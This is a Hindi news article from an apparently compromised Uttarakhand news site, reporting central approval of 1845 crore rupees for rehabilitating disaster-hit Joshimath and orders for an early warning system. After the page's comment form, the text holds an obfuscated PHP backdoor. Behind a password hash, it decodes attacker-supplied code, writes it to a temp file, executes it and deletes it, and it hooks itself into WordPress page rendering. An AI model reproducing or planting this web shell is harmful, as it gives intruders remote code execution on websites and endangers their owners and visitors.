Uttarakhand: केंद्र सरकार ने जोशीमठ के लिए 1845 करोड़ की दी मंजूरी, उपचार व पुनर्वास को जल्द जारी होगी 1464 करोड़ की राशि

Uttarakhand Press 9 October 2023: चमोली जिले में आपदा का दंश झेल रहे जोशीमठ शहर के उपचार व प्रभावितों के पुनर्वास के लिए 1845 करोड़ रुपये की कार्ययोजना स्वीकृत की गई है। इसमें केंद्रांश के रूप में 1464 करोड़ की राशि शीघ्र जारी की जाएगी। केंद्रीय गृह मंत्री अमित शाह ने वन अनुसंधान संस्थान में राज्य के अधिकारियों से जोशीमठ आपदा के संबंध में जानकारी लेने के बाद यह बात कही।

उत्तराखंड में अर्ली वार्निंग सिस्टम लागू करने के निर्देश:
केंद्रीय गृह मंत्री ने आपदा की दृष्टि से संवेदनशील उत्तराखंड में अर्ली वार्निंग सिस्टम लागू करने के निर्देश अधिकारियों को दिए, ताकि आपदा की स्थिति में समय रहते बचाव हो सके। इस पर सचिव आपदा प्रबंधन डा. रंजीत कुमार सिन्हा ने उन्हें अवगत कराया कि राज्य में मल्टी अर्ली वार्निंग सिस्टम विकसित करने की योजना है।इसका 118 करोड़ रुपये का प्रस्ताव भेजा गया है। यह योजना विश्व बैंक से वित्त पोषित होनी है।

गृह मंत्री ने राज्य के पहाड़ी शहरों में भवन निर्माण के लिए ऐसी उपविधियां बनाने के निर्देश दिए, जो ईको फ्रेंडली होने के साथ ही सतत विकास की अवधारणा के अनुरूप हों। उन्होंने पहाड़ी शहरों की स्थिति की जानकारी भी ली।

क्षमता को लेकर होगा परीक्षण:
सचिव आपदा प्रबंधन ने उन्हें अवगत कराया कि इन शहरों का ट्रोपोग्राफिकल, जियोटेक्निकल, जियोलाजिकल, जियोग्राफिकल सर्वेक्षण के साथ ही मिट्टी, पानी व धारण क्षमता को लेकर भी परीक्षण कराया जा रहा है। परीक्षण के उपरांत जो परिणाम आएंगे, उनके हिसाब से अलग-अलग नियम व उपविधियां बनाई जाएंगी।

Read Previous

Nainital: खेत की रखवाली करने गए किसान का नहर में मिला शव, परिजनों ने लगाया हत्या आरोप का आरोप

Read Next

Crime: स्कूल में अकेले था शिक्षक, सात छात्राओं को दौड़ाकर डंडे से पीटा, छात्राएं घायल, अभिभावकों का हंगामा

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}